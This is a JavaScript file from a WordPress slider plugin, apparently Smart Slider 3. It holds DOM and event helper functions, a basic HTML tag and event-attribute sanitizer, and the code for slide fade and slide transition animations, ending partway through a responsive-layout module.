(function(w){var window = w;

window._N2 = window._N2 || {
    _r: [],
    _d: [],
    r: function () {
        this._r.push(arguments);
    },
    d: function () {
        this._d.push(arguments);
    }
};

var document = w.document,
    html = document.documentElement,
    body, // Body is not available at this point
    undefined,
    setTimeout = w.setTimeout,
    clearTimeout = w.clearTimeout,
    _N2 = window._N2,
    _requestAnimationFrame = w.requestAnimationFrame,
    /**
     *
     * @param {string} tagName
     * @param {string|[]} [classes]
     * @param {{}} [attributes]
     * @param {{}} [data]
     * @return {HTMLElement}
     */
    _CreateElement = function (tagName, classes = null, attributes = null, data = null) {

        const element = document.createElement(tagName);

        if (classes) {
            if (typeof classes === 'string') {
                _NodeAddClass(element, classes);
            } else {
                _NodeAddClasses(element, classes);
            }
        }

        if (attributes) {
            _NodeSetAttributes(element, attributes);
        }

        if (data) {
            _NodeSetDatas(element, data);
        }

        return element;
    },
    /**
     *
     * @param {HTMLElement} appendTo
     * @param {string} tagName
     * @param {string|[]} [classes]
     * @param {{}} [attributes]
     * @param {{}} [data]
     * @return {HTMLElement}
     */
    _CreateElementIn = function (appendTo, tagName, classes, attributes, data) {
        const element = _CreateElement(tagName, classes, attributes, data);
        if (appendTo) {
            appendTo.appendChild(element);
        }
        return element;
    },

    /**
     *
     * @param {string} tagName
     * @param {string} text
     * @param {string|[]} [classes]
     * @param {{}} [attributes]
     * @param {{}} [data]
     * @return {HTMLDivElement}
     */
    _CreateElementText = function (tagName, text, classes, attributes, data) {
        const element = _CreateElement(tagName, classes, attributes, data);
        element.innerHTML = text;
        return element;
    },

    /**
     *
     * @param {HTMLElement} appendTo
     * @param {string} tagName
     * @param {string} text
     * @param {string|[]} [classes]
     * @param {{}} [attributes]
     * @param {{}} [data]
     * @return {HTMLDivElement}
     */
    _CreateElementTextIn = function (appendTo, tagName, text, classes, attributes, data) {
        const element = _CreateElementIn(appendTo, tagName, classes, attributes, data);
        element.innerHTML = text;
        return element;
    },

    /**
     *
     * @param {string|[]} [classes]
     * @param {{}} [attributes]
     * @param {{}} [data]
     * @return {HTMLDivElement}
     */
    _CreateElementDiv = function (classes, attributes, data) {
        return _CreateElement('div', classes, attributes, data);
    },

    /**
     *
     * @param {HTMLElement} appendTo
     * @param {string|[]} [classes]
     * @param {{}} [attributes]
     * @param {{}} [data]
     * @return {HTMLDivElement}
     */
    _CreateElementDivIn = function (appendTo, classes, attributes, data) {
        return _CreateElementIn(appendTo, 'div', classes, attributes, data);
    },
    /**
     *
     * @param {string} text
     * @param {string|[]} [classes]
     * @param {{}} [attributes]
     * @param {{}} [data]
     * @return {HTMLDivElement}
     */
    _CreateElementDivText = function (text, classes, attributes, data) {
        return _CreateElementText('div', text, classes, attributes, data);
    },

    /**
     *
     * @param {HTMLElement} appendTo
     * @param {string} text
     * @param {string|[]} [classes]
     * @param {{}} [attributes]
     * @param {{}} [data]
     * @return {HTMLDivElement}
     */
    _CreateElementDivTextIn = function (appendTo, text, classes, attributes, data) {
        return _CreateElementTextIn(appendTo, 'div', text, classes, attributes, data);
    },
    /**
     *
     * @param {string} label
     * @param {string} href
     * @param {string|[]} [classes]
     * @param {{}} [attributes]
     * @param {{}} [data]
     * @return {HTMLAnchorElement}
     */
    _CreateElementLink = function (label, href, classes, attributes, data) {
        const element = _CreateElement('a', classes, attributes, data);
        _NodeSetAttribute(element, 'href', href);
        element.innerHTML = label;
        return element;
    },

    /**
     *
     * @param {HTMLElement} appendTo
     * @param {string} label
     * @param {string} href
     * @param {string|[]} [classes]
     * @param {{}} [attributes]
     * @param {{}} [data]
     * @return {HTMLAnchorElement}
     */
    _CreateElementLinkIn = function (appendTo, label, href, classes, attributes, data) {
        const element = _CreateElementIn(appendTo, 'a', classes, attributes, data);
        _NodeSetAttribute(element, 'href', href);
        element.innerHTML = label;
        return element;
    },

    _Assign = Object.assign,
    _AssignRecursive = function (target, varArgs) {
        var to = Object(target);

        for (var index = 1; index < arguments.length; index++) {
            var nextSource = arguments[index];

            if (nextSource !== null && nextSource !== undefined) {
                for (var nextKey in nextSource) {
                    if (nextSource[nextKey] !== null && Object.prototype.hasOwnProperty.call(nextSource, nextKey)) {
                        if (typeof nextSource[nextKey] === 'object') {

                            if (nextSource[nextKey].constructor === Object || Array.isArray(nextSource[nextKey])) {
                                // Merge only plain objects or arrays
                                if (Array.isArray(nextSource[nextKey])) {
                                    to[nextKey] = []; // array value always overrides previous value
                                } else if (typeof to[nextKey] !== 'object' || Array.isArray(to[nextKey])) {
                                    to[nextKey] = {}; // always override if target is not object or target is an array.
                                }

                                to[nextKey] = _AssignRecursive(to[nextKey], nextSource[nextKey]);
                            } else {

                                to[nextKey] = nextSource[nextKey];
                            }
                        } else {
                            to[nextKey] = nextSource[nextKey];
                        }
                    }
                }
            }
        }
        return to;
    },
    _NodeGetAttribute = function (node, attribute) {
        return node.getAttribute(attribute);
    },
    _NodeSetAttribute = function (node, attribute, value) {
        node.setAttribute(attribute, value);
    },
    _NodeSetAttributes = function (node, attributes) {
        for (var k in attributes) {
            _NodeSetAttribute(node, k, attributes[k]);
        }
    },
    _NodeRemoveAttribute = function (node, name) {
        node.removeAttribute(name);
    },
    _NodeListSetAttribute = function (nodeList, attribute, value) {
        nodeList.forEach(function (node) {
            _NodeSetAttribute(node, attribute, value);
        });
    },
    _NodeListSetAttributes = function (nodeList, attribute) {
        nodeList.forEach(function (node) {
            _NodeSetAttributes(node, attribute);
        });
    },
    _NodeListAddClass = function (nodeList, className) {
        nodeList.forEach(function (node) {
            _NodeAddClass(node, className);
        });
    },
    _NodeListRemoveClass = function (nodeList, className) {
        nodeList.forEach(function (node) {
            _NodeRemoveClass(node, className);
        });
    },
    _NodeGetData = function (node, property) {
        return node.dataset[property];
    },
    _NodeSetData = function (node, property, value) {
        node.dataset[property] = value;
    },
    _NodeSetDatas = function (node, datas) {
        for (let k in datas) {
            _NodeSetData(node, k, datas[k]);
        }
    },
    _NodeRemoveData = function (node, property) {
        delete node.dataset[property];
    },
    _NodeGetStyle = function (node, property) {
        return window.getComputedStyle(node).getPropertyValue(property);
    },
    _NodeSetStyle = function (node, property, value) {
        node.style.setProperty(property, value);
    },
    _NodeSetStyles = function (node, styles) {
        for (var k in styles) {
            _NodeSetStyle(node, k, styles[k]);
        }
    },
    _NodeRemoveStyle = function (node, property) {
        node.style.removeProperty(property);
    },
    _NodeRemoveStyles = function (node, styles) {
        styles.forEach(function (style) {
            _NodeRemoveStyle(node, style);
        });
    },
    _NodeListSetStyle = function (nodeList, property, value) {
        nodeList.forEach(function (node) {
            _NodeSetStyle(node, property, value);
        });
    },
    _NodeListSetStyles = function (nodeList, styles) {
        nodeList.forEach(function (node) {
            _NodeSetStyles(node, styles);
        });
    },
    _NodeListRemoveStyle = function (nodeList, property) {
        nodeList.forEach(function (node) {
            _NodeRemoveStyle(node, property);
        });
    },
    _NodeRemove = function (node) {
        if (node && node.parentNode) {
            node.parentNode.removeChild(node);
        }
    },
    _NodeListRemove = function (nodeList) {
        nodeList.forEach(function (node) {
            _NodeRemove(node);
        });
    },
    _NodeAddClass = function (node, className) {
        node.classList.add(className);
    },
    _NodeAddClasses = function (node, classNames) {
        classNames.forEach(function (className) {
            node.classList.add(className);
        });
    },
    _NodeRemoveClass = function (node, className) {
        node.classList.remove(className);
    },
    _NodeRemoveClasses = function (node, classNames) {

        classNames.forEach(function (className) {
            node.classList.remove(className);
        });
    },
    _NodeToggleClass = function (node, className, state) {
        if (state) {
            _NodeAddClass(node, className);
        } else {
            _NodeRemoveClass(node, className);
        }
    },
    _NodeAppendTo = function (node, target) {
        target.appendChild(node);
    },
    _NodePrependTo = function (node, target) {

        if (target.childNodes.length) {
            _NodeInsertBefore(node, target.childNodes[0]);
        } else {
            target.appendChild(node);
        }
    },
    _NodeInsertAfter = function (node, target) {

        if (target.nextSibling) {
            _NodeInsertBefore(node, /** @var {Element} */ target.nextSibling);
        } else {
            target.parentNode.appendChild(node);
        }
    },
    _NodeInsertBefore = function (node, target) {

        target.parentNode.insertBefore(node, target);
    },
    _dispatchEvent = function (target, event) {
        return target.dispatchEvent(event);
    },
    _dispatchEventSimple = function (target, eventName, options) {
        options = _Assign({
            bubbles: true,
            cancelable: true
        }, options);
        return _dispatchEvent(target, new Event(eventName, options));
    },
    _dispatchEventSimpleNoBubble = function (target, eventName) {
        return _dispatchEvent(target, new Event(eventName, {
            bubbles: false,
            cancelable: false
        }));
    },
    _dispatchCustomEventNoBubble = function (target, eventName, detail) {
        return _dispatchEvent(target, new CustomEvent(eventName, {
            bubbles: false,
            cancelable: false,
            detail: detail
        }));
    },
    _removeEventListener = function (target, type, listener, options) {
        target.removeEventListener(type, listener, options);
    },
    _removeEventListeners = function (eventListeners) {
        eventListeners.forEach(function (removeCallback) {
            removeCallback()
        });
        eventListeners.splice(0, eventListeners.length);
    },
    _addEventListenerWithRemover = function (target, type, listener, options) {
        options = options || {};
        target.addEventListener(type, listener, options);

        return target.removeEventListener.bind(target, type, listener, options);
    },
    _addEventListener = function (target, type, listener, options) {
        options = options || {};
        target.addEventListener(type, listener, options);
    },
    _addEventListenerOnce = function (target, type, listener) {
        target.addEventListener(type, listener, {
            once: true
        });
    },
    _dispatchPrivateEvent = function (target, event, data) {
        if (target.ssEvent && target.ssEvent[event]) {
            var listeners = target.ssEvent[event];
            listeners.forEach(function (listener) {
                listener(data);
            })
        }
    },
    _addPrivateEventListener = function (target, type, listener) {
        if (!target.ssEvent) {
            target.ssEvent = {};
        }
        if (!target.ssEvent[type]) {
            target.ssEvent[type] = [];
        }
        target.ssEvent[type].push(listener);
    },
    _addPrivateEventListenerWithRemover = function (target, type, listener) {
        _addPrivateEventListener(target, type, listener);

        return _removePrivateEventListener.bind(target, type, listener);
    },
    _removePrivateEventListener = function (type, listener) {
        if (this.ssEvent && this.ssEvent[type]) {
            var listeners = this.ssEvent[type];
            for (var i = listeners.length - 1; i >= 0; i--) {
                if (listeners[i] === listener) {
                    listeners.splice(i, 1);
                }
            }
        }
    },
    _getScrollTop = function () {
        return html.scrollTop;
    },
    _setScrollTop = function (top) {
        html.scrollTop = top;
    },
    _getScrollLeft = function () {
        return html.scrollLeft;
    },
    _getWidth = function (element) {
        return element.getBoundingClientRect().width;
    },
    _getHeight = function (element) {
        return element.getBoundingClientRect().height;
    },
    _getOffsetTop = function (element) {
        return document.scrollingElement.scrollTop + element.getBoundingClientRect().top;
    },
    _ready = function (fn) {
        if (document.readyState === "complete" || document.readyState === "interactive") {
            fn();
        } else {
            if (Document && Document.prototype && Document.prototype.addEventListener && Document.prototype.addEventListener !== document.addEventListener) {
                const fn2 = () => {
                    fn();

                    fn = () => {
                    };
                };

                document.addEventListener("DOMContentLoaded", fn2);

                document.addEventListener("readystatechange", () => {
                    if (document.readyState === "complete" || document.readyState === "interactive") {
                        fn2();
                    }
                });


                /**
                 * WP Rocket overwrites the document.addEventListener which prevents sliders to show.
                 * In that case we use the prototype method to use the native code.
                 */
                Document.prototype.addEventListener.call(document, "DOMContentLoaded", fn2);
            } else {
                document.addEventListener("DOMContentLoaded", fn);
            }
        }
    },
    _animateScroll = function (element, targetTop, duration, doneCallback) {
        if (Math.abs(element.scrollTop - targetTop) < 1) {
            /**
             * Android Chrome has a jumping bug if we change too small scrollTop
             * @see SSDEV-2524
             */
            if (doneCallback) {
                doneCallback();
            }
        } else {
            duration = Math.max(300, duration || 300);

            var currentScrollTop = element.scrollTop,
                diff = targetTop - currentScrollTop,
                startTimestamp = performance.now(),
                _raf = function (timestamp) {
                    var progress = Math.min(1, (timestamp - startTimestamp) / duration);
                    if (progress < 0.5) {
                        progress = 2 * progress * progress;
                    } else {
                        progress = -1 + (4 - 2 * progress) * progress;
                    }

                    element.scrollTop = currentScrollTop + progress * diff;
                    if (progress < 1) {
                        requestAnimationFrame(_raf);
                    } else if (doneCallback) {
                        doneCallback();
                    }
                };
            _raf(startTimestamp);
        }
    },
    _CreateSVGElement = function (tagName, attributes, parentNode) {
        var element = document.createElementNS("http://www.w3.org/2000/svg", tagName);
        if (attributes) {
            _SVGSetAttributes(element, attributes);

            if (parentNode) {
                parentNode.appendChild(element);
            }
        }
        return element;
    },
    _SVGSetAttribute = function (element, name, value) {
        element.setAttributeNS(null, name, value);
    },
    _SVGSetAttributes = function (element, attributes) {
        for (var k in attributes) {
            _SVGSetAttribute(element, k, attributes[k]);
        }
    },
    _ucFirst = function (s) {
        return s.charAt(0).toUpperCase() + s.slice(1);
    },
    _requestIdleCallback = navigator.userAgent.indexOf("+http://www.google.com/bot.html") > -1 ? function (cb) {
        cb();
    } : window.requestIdleCallback || function (cb) {
        return setTimeout(cb, 1);
    },
    _cancelIdleCallback = window.cancelIdleCallback || function (id) {
        clearTimeout(id);
    },
    _strip_tags = function (input, allowed) {
        allowed = (((allowed || '') + '')
            .toLowerCase()
            .match(/<[a-z][a-z0-9]*>/g) || [])
            .join('') // making sure the allowed arg is a string containing only tags in lowercase (<a><b><c>)
        var tags = /<\/?([a-z][a-z0-9]*)\b[^>]*>/gi,
            commentsAndPhpTags = /<!--[\s\S]*?-->|<\?(?:php)?[\s\S]*?\?>/gi
        return (input + '').replace(commentsAndPhpTags, '')
            .replace(tags, function ($0, $1) {
                return allowed.indexOf('<' + $1.toLowerCase() + '>') > -1 ? $0 : ''
            })
    },
    _filter_allowed_html = function (input, extraTags = '') {
        return _filter_js_events(_strip_tags(input, '<a><span><sub><sup><em><i><var><cite><b><strong><small><bdo><br><img><picture><source><u><del><bdi><ins>' + extraTags));
    },
    _filter_js_events = function (input) {
        var blacklist = [
                'onclick',
                'onfocus',
                'ondrag',
                'onmouse',
                'onwheel',
                'onscroll',
                'ontouch',
                'onload',
                'onerror'
            ],
            blacklistRegExp = new RegExp(blacklist.join("|"), 'gi');
        return input.replace(blacklistRegExp, 'not-allowed');
    }

_ready(function () {
    body = document.body;
});_N2.d('SmartSliderMainAnimationSimple', ['SmartSliderMainAnimationAbstract'], function () {

    /**
     * @memberOf _N2
     * @param slider
     * @param parameters
     * @constructor
     */
    function SmartSliderMainAnimationSimple(slider, parameters) {

        this.postBackgroundAnimation = false;
        this._currentBackgroundAnimation = false;
        this.reverseSlideIndex = null;

        parameters = _Assign({
            delay: 0,
            type: 'horizontal',
            shiftedBackgroundAnimation: 'auto'
        }, parameters);
        parameters.delay /= 1000;

        if (parameters.duration < 300) {
            parameters.type = 'no';
        }

        _N2.SmartSliderMainAnimationAbstract.prototype.constructor.call(this, slider, parameters);

        switch (this.parameters.type) {
            case 'no':
                this.animation = this._mainAnimationNo;
                this.isNoAnimation = true;
                break;
            case 'fade':
                this.animation = this._mainAnimationFade;
                break;
            case 'crossfade':
                this.animation = this._mainAnimationCrossFade;
                break;
            case 'vertical':
                if (slider.backgrounds.hasFixed) {
                    this.animation = this._mainAnimationFade;
                } else {
                    this.animation = this._mainAnimationVertical;
                }
                break;
            case 'vertical-reversed':
                if (slider.backgrounds.hasFixed) {
                    this.animation = this._mainAnimationFade;
                } else {
                    this.animation = this._mainAnimationVerticalReversed;
                }
                break;
            case 'horizontal-reversed':
                this.animation = this._mainAnimationHorizontalReversed;
                break;
            default:
                this.animation = this._mainAnimationHorizontal;
                break;
        }
    }

    SmartSliderMainAnimationSimple.prototype = Object.create(_N2.SmartSliderMainAnimationAbstract.prototype);
    SmartSliderMainAnimationSimple.prototype.constructor = SmartSliderMainAnimationSimple;

    SmartSliderMainAnimationSimple.prototype.changeTo = function (currentSlide, nextSlide, reversed, isSystem) {
        if (this.postBackgroundAnimation) {
            this.postBackgroundAnimation.prepareToSwitchSlide(currentSlide, nextSlide);
        }

        _N2.SmartSliderMainAnimationAbstract.prototype.changeTo.apply(this, arguments);
    };

    /**
     * Used to hide non active slides
     * @param slide
     */
    SmartSliderMainAnimationSimple.prototype.setActiveSlide = function (slide) {
        for (var i = 0; i < this.slider.slides.length; i++) {
            if (this.slider.slides[i] !== slide) {
                this.hideSlide(this.slider.slides[i]);
            }
        }
    };

    /**
     * Hides the slide, but not the usual way. Simply positions them outside of the slider area.
     * If we use the visibility or display property to hide we would end up corrupted YouTube api.
     * If opacity 0 might also work, but that might need additional resource from the browser
     * @param slide
     * @public
     */
    SmartSliderMainAnimationSimple.prototype.hideSlide = function (slide) {

        _N2.MW.___setValues(slide.SMWs, {x: -100000 * n2const.rtl.modifier});
    };

    SmartSliderMainAnimationSimple.prototype.showSlide = function (slide) {

        _N2.MW.___setValues(slide.SMWs, {x: 0, y: 0});
    };

    SmartSliderMainAnimationSimple.prototype.cleanSlideIndex = function (slideIndex) {
        this.hideSlide(this.slider.slides[slideIndex]);
    };


    SmartSliderMainAnimationSimple.prototype.revertTo = function (slideIndex, originalNextSlideIndex) {

        _N2.MW.___setValues(this.slider.slides[originalNextSlideIndex].SMWs, {zIndex: ''});

        this.hideSlide(this.slider.slides[originalNextSlideIndex]);

        _N2.SmartSliderMainAnimationAbstract.prototype.revertTo.apply(this, arguments);
    };

    SmartSliderMainAnimationSimple.prototype._initAnimation = function (currentSlide, nextSlide, reversed) {

        this.animation(currentSlide, nextSlide, reversed);
    };

    SmartSliderMainAnimationSimple.prototype.onBackwardChangeToComplete = function (previousSlide, currentSlide, isSystem) {
        this.reverseSlideIndex = null;
        this.onChangeToComplete(previousSlide, currentSlide, isSystem);
    };

    SmartSliderMainAnimationSimple.prototype.onChangeToComplete = function (previousSlide, currentSlide, isSystem) {
        if (this.reverseSlideIndex !== null) {
            _dispatchEventSimpleNoBubble(this.slider.slides[this.reverseSlideIndex].element, 'mainAnimationStartInCancel');
            this.reverseSlideIndex = null;
        }
        this.hideSlide(previousSlide);

        _N2.SmartSliderMainAnimationAbstract.prototype.onChangeToComplete.apply(this, arguments);
    };

    SmartSliderMainAnimationSimple.prototype.onReverseChangeToComplete = function (previousSlide, currentSlide, isSystem) {

        this.hideSlide(previousSlide);

        _N2.SmartSliderMainAnimationAbstract.prototype.onReverseChangeToComplete.apply(this, arguments);
    };

    SmartSliderMainAnimationSimple.prototype._mainAnimationNo = function (currentSlide, nextSlide) {

        this.parameters.delay = 0;
        this.parameters.duration = 0.1;

        this._mainAnimationFade(currentSlide, nextSlide);
    };

    SmartSliderMainAnimationSimple.prototype._mainAnimationFade = function (currentSlide, nextSlide) {

        _N2.MW.___setValues(currentSlide.SMWs, {zIndex: 23});

        this.showSlide(nextSlide);

        currentSlide.unsetActive();
        nextSlide.setActive();

        var adjustedTiming = this.adjustMainAnimation();

        if (this.parameters.shiftedBackgroundAnimation !== 0) {
            var needShift = false,
                resetShift = false;
            if (this.parameters.shiftedBackgroundAnimation === 'auto') {
                if (currentSlide.hasLayers()) {
                    needShift = true;
                } else {
                    resetShift = true;
                }
            } else {
                needShift = true;
            }

            if (this._currentBackgroundAnimation && needShift) {
                var shift = adjustedTiming.outDuration - adjustedTiming.extraDelay;
                if (shift > 0) {
                    this.timeline.shiftChildren(shift);
                }
                if (this._currentBackgroundAnimation.shiftedPreSetup) {
                    this._currentBackgroundAnimation._preSetup();
                }
            } else if (resetShift) {
                if (adjustedTiming.extraDelay > 0) {
                    this.timeline.shiftChildren(adjustedTiming.extraDelay);
                }
                if (this._currentBackgroundAnimation.shiftedPreSetup) {
                    this._currentBackgroundAnimation._preSetup();
                }
            }
        } else if (this._currentBackgroundAnimation !== false) {
            adjustedTiming.outDelay += 0.1;
        }

        var currentSMWs = [currentSlide.SMWs[0]];
        if (!this._currentBackgroundAnimation && currentSlide.SMWs[1]) {
            currentSMWs.push(currentSlide.SMWs[1]);
        }

        this.timeline.fromTo(currentSMWs, adjustedTiming.outDuration, {
            opacity: 1
        }, {
            opacity: 0,
            ease: this.getEase()
        }, adjustedTiming.outDelay);

        var nextSlideSMW = _N2.MW.___getSMW(nextSlide.element);
        this.timeline.fromTo(nextSlideSMW, adjustedTiming.inDuration, {
            opacity: 0
        }, {
            opacity: 1,
            ease: this.getEase()
        }, adjustedTiming.inDelay);

        if (!this._currentBackgroundAnimation && nextSlide.background) {
            _N2.MW.___getSMW(nextSlide.background.element).opacity = 1;
        }

        _addEventListenerOnce(this.sliderElement, 'mainAnimationComplete', (function (e) {

            var currentSlide = this.slider.slides[e.detail.previousSlideIndex];

            _N2.MW.___setValues(currentSlide.SMWs, {zIndex: '', opacity: 1});
        }).bind(this));

        this.slider.updateInsideSlides([currentSlide, nextSlide]);
    };

    SmartSliderMainAnimationSimple.prototype._mainAnimationCrossFade = function (currentSlide, nextSlide) {

        _N2.MW.___setValues(currentSlide.SMWs, {zIndex: 23});

        this.showSlide(nextSlide);

        currentSlide.unsetActive();
        nextSlide.setActive();

        var adjustedTiming = this.adjustMainAnimation();

        if (this.parameters.shiftedBackgroundAnimation != 0) {
            var needShift = false,
                resetShift = false;
            if (this.parameters.shiftedBackgroundAnimation == 'auto') {
                if (currentSlide.hasLayers()) {
                    needShift = true;
                } else {
                    resetShift = true;
                }
            } else {
                needShift = true;
            }

            if (this._currentBackgroundAnimation && needShift) {
                var shift = adjustedTiming.outDuration - adjustedTiming.extraDelay;
                if (shift > 0) {
                    this.timeline.shiftChildren(shift);
                }
                if (this._currentBackgroundAnimation.shiftedPreSetup) {
                    this._currentBackgroundAnimation._preSetup();
                }
            } else if (resetShift) {
                if (adjustedTiming.extraDelay > 0) {
                    this.timeline.shiftChildren(adjustedTiming.extraDelay);
                }
                if (this._currentBackgroundAnimation.shiftedPreSetup) {
                    this._currentBackgroundAnimation._preSetup();
                }
            }
        } else if (this._currentBackgroundAnimation !== false) {
            adjustedTiming.outDelay += 0.1;
        }

        var currentSMWs = [currentSlide.SMWs[0]];
        if (!this._currentBackgroundAnimation && currentSlide.SMWs[1]) {
            currentSMWs.push(currentSlide.SMWs[1]);
        }

        this.timeline.fromTo(currentSMWs, adjustedTiming.outDuration, {
            opacity: 1
        }, {
            opacity: 0,
            ease: this.getEase()
        }, adjustedTiming.outDelay);

        var nextSMWs = [nextSlide.SMWs[0]];
        if (!this._currentBackgroundAnimation && nextSlide.SMWs[1]) {
            nextSMWs.push(nextSlide.SMWs[1]);
        }
        this.timeline.fromTo(nextSMWs, adjustedTiming.inDuration, {
            opacity: 0
        }, {
            opacity: 1,
            ease: this.getEase()
        }, adjustedTiming.inDelay);

        _addEventListenerOnce(this.sliderElement, 'mainAnimationComplete', (function (e) {

            var currentSlide = this.slider.slides[e.detail.previousSlideIndex],
                nextSlide = this.slider.slides[e.detail.currentSlideIndex];

            _N2.MW.___setValues(currentSlide.SMWs, {zIndex: '', opacity: 1});
            _N2.MW.___setValues(nextSlide.SMWs, {opacity: 1});
        }).bind(this));

        this.slider.updateInsideSlides([currentSlide, nextSlide]);
    };

    SmartSliderMainAnimationSimple.prototype._mainAnimationHorizontal = function (currentSlide, nextSlide, reversed) {
        this.__mainAnimationDirection(currentSlide, nextSlide, 'horizontal', reversed);
    };

    SmartSliderMainAnimationSimple.prototype._mainAnimationVertical = function (currentSlide, nextSlide, reversed) {
        this.showSlide(nextSlide);
        this.__mainAnimationDirection(currentSlide, nextSlide, 'vertical', reversed);
    };

    SmartSliderMainAnimationSimple.prototype._mainAnimationHorizontalReversed = function (currentSlide, nextSlide, reversed) {
        this.__mainAnimationDirection(currentSlide, nextSlide, 'horizontal', !reversed);
    };

    SmartSliderMainAnimationSimple.prototype._mainAnimationVerticalReversed = function (currentSlide, nextSlide, reversed) {
        this.showSlide(nextSlide);
        this.__mainAnimationDirection(currentSlide, nextSlide, 'vertical', !reversed);
    };

    SmartSliderMainAnimationSimple.prototype.__mainAnimationDirection = function (currentSlide, nextSlide, direction, reversed) {

        var currentSMWs = currentSlide.SMWs,
            nextSMWs = nextSlide.SMWs,
            insideSlides = [currentSlide, nextSlide],
            property = '',
            propertyValue = 0,
            originalPropertyValue = 0;

        if (direction === 'horizontal') {
            property = 'x';
            originalPropertyValue = propertyValue = Math.floor(this.slider.responsive.resizeContext.slideOuterWidth);

            if (n2const.rtl.isRtl) {
                reversed = !reversed;
            }
        } else if (direction === 'vertical') {
            property = 'y';
            originalPropertyValue = propertyValue = Math.floor(this.slider.responsive.resizeContext.slideOuterHeight);
        }

        if (reversed) {
            propertyValue *= -1;
        }

        var nextSlideFrom = {},
            nextSlideTo = {
                snap: 'x,y',
                ease: this.getEase()
            },
            currentSlideTo = {
                snap: 'x,y',
                ease: this.getEase()
            };

        nextSlideFrom[property] = propertyValue;

        currentSlideTo[property] = -propertyValue;


        _N2.MW.___setValues(currentSMWs, {zIndex: 23});

        var _nextProp = {zIndex: 23}
        _nextProp[property] = propertyValue;
        _N2.MW.___setValues(nextSMWs, _nextProp);

        currentSlide.unsetActive();
        nextSlide.setActive();

        var adjustedTiming = this.adjustMainAnimation();
        nextSlideTo[property] = 0;

        this.timeline.fromTo(nextSMWs, adjustedTiming.inDuration, nextSlideFrom, nextSlideTo, adjustedTiming.inDelay);

        if (this.parameters.shiftedBackgroundAnimation != 0) {
            var needShift = false,
                resetShift = false;
            if (this.parameters.shiftedBackgroundAnimation === 'auto') {
                if (currentSlide.hasLayers()) {
                    needShift = true;
                } else {
                    resetShift = true;
                }
            } else {
                needShift = true;
            }

            if (this._currentBackgroundAnimation && needShift) {
                var shift = adjustedTiming.outDuration - adjustedTiming.extraDelay;
                if (shift > 0) {
                    this.timeline.shiftChildren(shift);
                }
                if (this._currentBackgroundAnimation.shiftedPreSetup) {
                    this._currentBackgroundAnimation._preSetup();
                }
            } else if (resetShift) {
                if (adjustedTiming.extraDelay > 0) {
                    this.timeline.shiftChildren(adjustedTiming.extraDelay);
                }
                if (this._currentBackgroundAnimation.shiftedPreSetup) {
                    this._currentBackgroundAnimation._preSetup();
                }
            }
        } else if (this._currentBackgroundAnimation !== false) {
            adjustedTiming.outDelay += 0.1;
        }

        this.timeline.to(currentSMWs, adjustedTiming.outDuration, currentSlideTo, adjustedTiming.outDelay);

        if (this.isTouch && this.isReverseAllowed) {

            var reverseSlide;
            if (reversed) {
                if (!this.slider.blockCarousel || !this.slider.isChangeCarousel('next')) {
                    reverseSlide = currentSlide.getNext();
                }
            } else {
                if (!this.slider.blockCarousel || !this.slider.isChangeCarousel('previous')) {
                    reverseSlide = currentSlide.getPrevious();
                }
            }

            if (reverseSlide && reverseSlide !== nextSlide) {

                this.reverseSlideIndex = reverseSlide.index;
                this.enableReverseMode();

                insideSlides.push(reverseSlide);

                if (direction === 'vertical') {
                    this.showSlide(reverseSlide);
                }

                var reverseSMWs = reverseSlide.SMWs;

                var _reverseProp = {}
                _reverseProp[property] = propertyValue;
                _N2.MW.___setValues(reverseSMWs, _reverseProp);

                var reversedInFrom = {},
                    reversedInProperties = {
                        snap: 'x,y',
                        ease: this.getEase()
                    },
                    reversedOutFrom = {},
                    reversedOutProperties = {
                        snap: 'x,y',
                        ease: this.getEase()
                    };

                reversedInProperties[property] = 0;
                reversedInFrom[property] = -propertyValue;
                reversedOutProperties[property] = propertyValue;
                reversedOutFrom[property] = 0;

                reverseSlide.__$dispatchEvent('mainAnimationStartIn', {
                    mainAnimation: this,
                    previousSlideIndex: currentSlide.index,
                    currentSlideIndex: reverseSlide.index,
                    isSystem: false
                });

                this.reverseTimeline.paused(true);
                this.reverseTimeline.eventCallback('onComplete', this.onBackwardChangeToComplete.bind(this), [currentSlide, reverseSlide, false]);

                this.reverseTimeline.fromTo(reverseSMWs, adjustedTiming.inDuration, reversedInFrom, reversedInProperties, adjustedTiming.inDelay);
                this.reverseTimeline.fromTo(currentSMWs, adjustedTiming.inDuration, reversedOutFrom, reversedOutProperties, adjustedTiming.inDelay);
            } else {
                this.reverseSlideIndex = null;
            }
        }


        _addEventListenerOnce(this.sliderElement, 'mainAnimationComplete', (function (e) {

            var currentSlide = this.slider.slides[e.detail.previousSlideIndex],
                nextSlide = this.slider.slides[e.detail.currentSlideIndex];

            _N2.MW.___setValues(currentSlide.SMWs, {zIndex: ''});
            _N2.MW.___setValues(nextSlide.SMWs, {zIndex: ''});
        }).bind(this));

        this.slider.updateInsideSlides(insideSlides);
    };

    SmartSliderMainAnimationSimple.prototype.getExtraDelay = function () {
        return 0;
    };

    SmartSliderMainAnimationSimple.prototype.adjustMainAnimation = function () {
        var duration = this.parameters.duration,
            delay = this.parameters.delay,
            backgroundAnimationDuration = this.timeline.totalDuration(),
            extraDelay = this.getExtraDelay();

        if (backgroundAnimationDuration > 0) {
            /**
             * The WordPress free version without GSAP, the .set() implementation adds a 0.05 duration .to tween.
             * @see SSDEV-3127
             */
            backgroundAnimationDuration -= 0.05;
        

            var totalMainAnimationDuration = duration + delay;
            if (totalMainAnimationDuration > backgroundAnimationDuration) {
                duration = duration * backgroundAnimationDuration / totalMainAnimationDuration;
                delay = delay * backgroundAnimationDuration / totalMainAnimationDuration;
                if (delay < extraDelay) {
                    duration -= (extraDelay - delay);
                    delay = extraDelay;
                }
            } else {
                return {
                    inDuration: duration,
                    outDuration: duration,
                    inDelay: backgroundAnimationDuration - duration,
                    outDelay: extraDelay,
                    extraDelay: extraDelay
                }
            }
        } else {
            delay += extraDelay;
        }
        return {
            inDuration: duration,
            outDuration: duration,
            inDelay: delay,
            outDelay: delay,
            extraDelay: extraDelay
        }
    };

    SmartSliderMainAnimationSimple.prototype.hasBackgroundAnimation = function () {
        return false;
    };

    return SmartSliderMainAnimationSimple;
});_N2.d('SmartSliderResponsiveSimple', ['SmartSliderResponsive'], function () {

    /**
     * @memberOf _N2
     *
     * @augments _N2.SmartSliderResponsive
     * @constructor
     */
    function SmartSliderResponsiveSimple() {
        this.round = 1;
        _N2.SmartSliderResponsive.prototype.constructor.apply(this, arguments);

        this.___isFullPageConstrainRatio = this.sliderElement.classList.contains('n2-ss-full-page--constrain-ratio');

        /**
         * @type {_N2.SmartSliderMainAnimationSimple}
         */
        this.mainAnimation = this.slider.mainAnimation;
    }

